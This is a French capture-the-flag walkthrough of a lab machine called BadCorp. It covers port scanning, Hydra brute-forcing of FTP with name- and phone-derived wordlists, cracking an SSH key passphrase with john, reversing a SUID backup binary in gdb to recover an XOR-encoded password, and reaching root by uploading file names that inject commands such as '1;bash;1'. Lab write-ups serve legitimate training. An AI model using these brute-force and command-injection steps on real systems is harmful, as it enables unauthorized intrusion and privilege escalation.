# BadCorp `énumération` `reverse` `hydra` `suid` `command injection` * Nom machine : BadCorp * Difficulté : Difficile * OS : Linux ## Enumération ### NMAP ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 05:48 EDT Nmap scan report for 192.168.210.133 Host is up (0.033s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp Pure-FTPd 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA) | 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA) |_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: BadCorp| Html5 Agency template |_http-server-header: Apache/2.4.38 (Debian) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### HTTP (80) Nous visitons la page et trouvons rien de véritablement intéressant. Nous avons trouvé une adresse mail, ce qui nous conduit à un nom de domaine : badcorp.lo. Nous l'avons ajouté au fichier /etc/hosts puis avons mené une énumération de sous-domaine et de répertoires. Sans résultats. La seule page nous fournissant quelques informations est la page about.html, nous avons des noms et des numéros de téléphones... On va récupérer ces noms afin d'en créer une liste d'username puis essayer de buteforce avec hydra. ``` ┌──(kali㉿kali)-[~/oscp] └─$ python ../usernames.py -w 'user.txt' > user1.txt ┌──(kali㉿kali)-[~/oscp] └─$ cat user1.txt justin hammer j.hammer j-hammer j_hammer j+hammer jhammer justinhammer hammerjustin justin.hammer hammer.justin ┌──(kali㉿kali)-[~/oscp] └─$ cat pass1.txt +23-34567890 34567890 2334567890 ``` Même principe avec les autres utilisateurs ``` ┌──(kali㉿kali)-[~/oscp] └─$ hydra -L user3.txt -P pass3.txt ftp://badcorp.lo Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-19 06:48:57 [DATA] max 16 tasks per 1 server, overall 16 tasks, 33 login tries (l:11/p:3), ~3 tries per task [DATA] attacking ftp://badcorp.lo:21/ [21][ftp] host: badcorp.lo login: hoswald password: 34566550 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-19 06:49:13 ``` Bingo ! ## Accès initial ``` ┌──(kali㉿kali)-[~] └─$ ftp 192.168.210.133 Connected to 192.168.210.133. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 2 of 50 allowed. 220-Local time is now 06:49. Server port: 21. 220-This is a private system - No anonymous login 220 You will be disconnected after 15 minutes of inactivity. Name (192.168.210.133:kali): hoswald 331 User hoswald OK. Password required Password: 230 OK. Current directory is / Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 229 Extended Passive mode OK (|||32235|) 150 Accepted data connection -rwxrwxr-- 1 0 0 1766 Feb 24 2021 id_rsa 226-Options: -l 226 1 matches total ftp> mget id_rsa mget id_rsa [anpqy?]? 229 Extended Passive mode OK (|||61027|) 150 Accepted data connection 100% |***************| 1766 1.21 MiB/s 00:00 ETA 226-File successfully transferred 226 0.001 seconds (measured here), 3.15 Mbytes per second 1766 bytes received in 00:00 (587.80 KiB/s) ftp> exit 221-Goodbye. You uploaded 0 and downloaded 2 kbytes. 221 Logout. ``` ``` ──(kali㉿kali)-[~] └─$ chmod 600 id_rsa ┌──(kali㉿kali)-[~] └─$ ssh oswald@badcorp.lo -i id_rsa The authenticity of host 'badcorp.lo (192.168.210.133)' can't be established. ED25519 key fingerprint is SHA256:mqPCrimr9j626KOGoHM+qxgHUOYD4pu1+4KzhIvu5uA. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:8: [hashed name] ~/.ssh/known_hosts:10: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'badcorp.lo' (ED25519) to the list of known hosts. Enter passphrase for key 'id_rsa': ``` Nous avons besoin d'une passphrase. ``` ┌──(kali㉿kali)-[~/oscp] └─$ ssh2john id_rsa > hash.txt ┌──(kali㉿kali)-[~/oscp] └─$ john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 5 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status developer (id_rsa) 1g 0:00:00:00 DONE (2024-08-19 08:45) 25.00g/s 3754Kp/s 3754Kc/s 3754KC/s dick13..dester Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` ``` ┌──(kali㉿kali)-[~] └─$ ssh hoswald@192.168.210.133 -i id_rsa Enter passphrase for key 'id_rsa': Linux badcorp 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. $ id uid=1000(hoswald) gid=1000(hoswald) groups=1000(hoswald) ``` ## Elévation des privilèges ``` $ find / -perm -u=s 2>/dev/null /usr/local/bin/backup /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/bin/mount /usr/bin/passwd /usr/bin/su /usr/bin/fusermount /usr/bin/umount /usr/bin/chfn /usr/bin/chsh /usr/bin/newgrp /usr/bin/sudo /usr/bin/gpasswd $ /usr/local/bin/backup USAGE: backup $ /usr/local/bin/backup developer Wrong Password !!! ``` Nous allons chercher le mot de passe. Avec la commande strings nous ne trouvons rien d'intéressant, nous allons donc télécharger le fichier sur notre machine. ``` ┌──(kali㉿kali)-[~/oscp] └─$ scp -i id_rsa hoswald@badcorp.lo:/usr/local/bin/backup . Enter passphrase for key 'id_rsa': backup ``` ### Reverse ``` ┌──(kali㉿kali)-[~/oscp] └─$ gdb backup GNU gdb (Debian 13.2-1+b2) 13.2 Copyright (C) 2023 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: . Find the GDB manual and other documentation resources online at: . For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from backup... (No debugging symbols found in backup) (gdb) set args test (gdb) run Starting program: /home/kali/oscp/backup test [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Wrong Password !!! [Inferior 1 (process 16796) exited normally] (gdb) disas main Dump of assembler code for function main: 0x0000555555555575 <+0>: push %rbp 0x0000555555555576 <+1>: mov %rsp,%rbp 0x0000555555555579 <+4>: sub $0x20,%rsp 0x000055555555557d <+8>: mov %edi,-0x14(%rbp) 0x0000555555555580 <+11>: mov %rsi,-0x20(%rbp) 0x0000555555555584 <+15>: mov $0x0,%edi 0x0000555555555589 <+20>: call 0x5555555550d0 0x000055555555558e <+25>: cmpl $0x2,-0x14(%rbp) 0x0000555555555592 <+29>: jne 0x5555555555d8 0x0000555555555594 <+31>: mov -0x20(%rbp),%rax 0x0000555555555598 <+35>: add $0x8,%rax 0x000055555555559c <+39>: mov (%rax),%rax 0x000055555555559f <+42>: mov %rax,%rdi 0x00005555555555a2 <+45>: call 0x5555555551e5 0x00005555555555a7 <+50>: mov %eax,-0x4(%rbp) 0x00005555555555aa <+53>: mov -0x20(%rbp),%rax 0x00005555555555ae <+57>: add $0x8,%rax 0x00005555555555b2 <+61>: mov (%rax),%rax 0x00005555555555b5 <+64>: mov %rax,%rdi 0x00005555555555b8 <+67>: call 0x5555555554f0 0x00005555555555bd <+72>: mov %eax,-0x8(%rbp) 0x00005555555555c0 <+75>: cmpl $0x0,-0x4(%rbp) 0x00005555555555c4 <+79>: jne 0x5555555555ea 0x00005555555555c6 <+81>: cmpl $0x0,-0x8(%rbp) 0x00005555555555ca <+85>: jne 0x5555555555ea 0x00005555555555cc <+87>: mov $0x0,%eax 0x00005555555555d1 <+92>: call 0x5555555552ab --Type for more, q to quit, c to continue without paging--c 0x00005555555555d6 <+97>: jmp 0x5555555555ea 0x00005555555555d8 <+99>: cmpl $0x1,-0x14(%rbp) 0x00005555555555dc <+103>: jg 0x5555555555ea 0x00005555555555de <+105>: lea 0xb1c(%rip),%rdi # 0x555555556101 0x00005555555555e5 <+112>: call 0x555555555040 0x00005555555555ea <+117>: mov $0x0,%eax 0x00005555555555ef <+122>: leave 0x00005555555555f0 <+123>: ret End of assembler dump. (gdb) disas check Dump of assembler code for function check: 0x00005555555554f0 <+0>: push %rbp 0x00005555555554f1 <+1>: mov %rsp,%rbp 0x00005555555554f4 <+4>: sub $0x30,%rsp 0x00005555555554f8 <+8>: mov %rdi,-0x28(%rbp) 0x00005555555554fc <+12>: mov -0x28(%rbp),%rcx 0x0000555555555500 <+16>: lea -0x12(%rbp),%rax 0x0000555555555504 <+20>: mov $0x9,%edx 0x0000555555555509 <+25>: mov %rcx,%rsi 0x000055555555550c <+28>: mov %rax,%rdi 0x000055555555550f <+31>: call 0x555555555030 0x0000555555555514 <+36>: movl $0x0,-0x4(%rbp) 0x000055555555551b <+43>: jmp 0x555555555539 0x000055555555551d <+45>: mov -0x4(%rbp),%eax 0x0000555555555520 <+48>: cltq 0x0000555555555522 <+50>: movzbl -0x12(%rbp,%rax,1),%eax 0x0000555555555527 <+55>: xor $0xc,%eax 0x000055555555552a <+58>: mov %eax,%edx 0x000055555555552c <+60>: mov -0x4(%rbp),%eax 0x000055555555552f <+63>: cltq 0x0000555555555531 <+65>: mov %dl,-0x12(%rbp,%rax,1) 0x0000555555555535 <+69>: addl $0x1,-0x4(%rbp) 0x0000555555555539 <+73>: cmpl $0x7,-0x4(%rbp) 0x000055555555553d <+77>: jle 0x55555555551d 0x000055555555553f <+79>: lea -0x12(%rbp),%rax 0x0000555555555543 <+83>: lea 0x2b3e(%rip),%rsi # 0x555555558088 0x000055555555554a <+90>: mov %rax,%rdi --Type for more, q to quit, c to continue without paging--c 0x000055555555554d <+93>: call 0x555555555090 0x0000555555555552 <+98>: mov %eax,-0x8(%rbp) 0x0000555555555555 <+101>: cmpl $0x0,-0x8(%rbp) 0x0000555555555559 <+105>: jne 0x555555555562 0x000055555555555b <+107>: mov $0x0,%eax 0x0000555555555560 <+112>: jmp 0x555555555573 0x0000555555555562 <+114>: lea 0xb85(%rip),%rdi # 0x5555555560ee 0x0000555555555569 <+121>: call 0x555555555040 0x000055555555556e <+126>: mov $0xffffffff,%eax 0x0000555555555573 <+131>: leave 0x0000555555555574 <+132>: ret ``` Nous avons chargé le programme, ajouté un argument, et deassemblé deux fonctions : main et check. Ici check nous intéresse, nous devons savoir quelles sont les valeurs contenu dans les registres avant l'appel de la fonction strcmp. Nous allons mettre un breakpoint à l'adresse 0x000055555555554d (call 0x555555555090 ) ``` (gdb) b * 0x000055555555554d Breakpoint 1 at 0x55555555554d (gdb) run Starting program: /home/kali/oscp/backup test [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Breakpoint 1, 0x000055555555554d in check () (gdb) info registers rax 0x7fffffffdd0e 140737488346382 rbx 0x7fffffffde68 140737488346728 rcx 0x0 0 rdx 0xc 12 rsi 0x555555558088 93824992247944 rdi 0x7fffffffdd0e 140737488346382 rbp 0x7fffffffdd20 0x7fffffffdd20 rsp 0x7fffffffdcf0 0x7fffffffdcf0 r8 0x10 16 r9 0x7ffff7fcfb30 140737353939760 r10 0x7ffff7dd84d8 140737351877848 r11 0x7ffff7f20500 140737353221376 r12 0x0 0 r13 0x7fffffffde80 140737488346752 r14 0x7ffff7ffd000 140737354125312 r15 0x0 0 rip 0x55555555554d 0x55555555554d eflags 0x202 [ IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 ``` Nous allons voir ce que contient le registre rsi (présent deux lignes au dessus avec comme nom de variables "pw") ``` (gdb) x/s $rsi 0x555555558088 : "|8\177\177{<~:" ``` Le password semble encodé. Une ligne nous intéresse dans le code précédement déassemblé : xor $0xc,%eax. La clé XOR est 0xc. Nous pouvons décoder le mot de passe.
Revenons à notre binaire sur notre victime ``` hoswald@badcorp:/var/logs/hoswald$ strings /usr/local/bin/backup /lib64/ld-linux-x86-64.so.2 {...} u/UH []A\A]A^A_ Bad character found ! /var/logs/%s/ /home/FTP/%s/ Could not open current directory Create destination directory /bin/mkdir -p /var/logs/%s/ FOLDER %s %s /bin/cp -rf %s%s %s FILE ALL FILE COPYED IN %s Wrong Password !!! USAGE: backup ;*3$" {<~:GCC: (Debian 8.3.0-6) 8.3.0 crtstuff.c deregister_tm_clones {...} ``` Grâce à la commande string nous pouvons voir ce que fait le programme. ``` hoswald@badcorp:~$ /usr/local/bin/backup p4ssw0r6 Create destination directory FILE id_rsa ALL FILE COPYED IN /var/logs/hoswald/ ``` Le binaire copie les fichier présents dans le dossier FTP puis copier dans /var/logs/hoswald/, nous allons voir si nous pouvons injecter des commandes en uploadant des fichier par ftp. ``` ┌──(kali㉿kali)-[~] └─$ touch "test;whoami" ┌──(kali㉿kali)-[~] └─$ touch "test;whoami;" ┌──(kali㉿kali)-[~] └─$ touch "test;whoami;id" {...} ftp> put test;whoami;id local: test;whoami;id remote: test;whoami;id 229 Extended Passive mode OK (|||8383|) 150 Accepted data connection 0 0.00 KiB/s 226 File successfully transferred ftp> dir 229 Extended Passive mode OK (|||29312|) 150 Accepted data connection -rwxrwxr-- 1 0 0 1766 Feb 24 2021 id_rsa -rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:21 test;whoami -rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:21 test;whoami; -rw-r--r-- 1 1006 ftpusr 0 Aug 19 10:23 test;whoami;id ``` ``` hoswald@badcorp:/var/logs/hoswald$ /usr/local/bin/backup p4ssw0r6 FILE shell.php FILE test;whoami; /bin/cp: missing destination file operand after '/home/FTP/hoswald/test' Try '/bin/cp --help' for more information. root sh: 1: /var/logs/hoswald/: Permission denied FILE id_rsa FILE test;whoami /bin/cp: missing destination file operand after '/home/FTP/hoswald/test' Try '/bin/cp --help' for more information. whoami: extra operand ‘/var/logs/hoswald/’ Try 'whoami --help' for more information. FILE reverse.elf FILE test;whoami;id /bin/cp: missing destination file operand after '/home/FTP/hoswald/test' Try '/bin/cp --help' for more information. root id: ‘/var/logs/hoswald/’: no such user ALL FILE COPYED IN /var/logs/hoswald/ ``` root ! Nous n'avons plus qu'à upload: `"1;bash;1"` ``` hoswald@badcorp:~$ /usr/local/bin/backup p4ssw0r6 FILE 1;bash;1 /bin/cp: missing destination file operand after '/home/FTP/hoswald/1' Try '/bin/cp --help' for more information. root@badcorp:~# whoami root ``` Nous pouvons aussi uploader par exemple : $(whoami)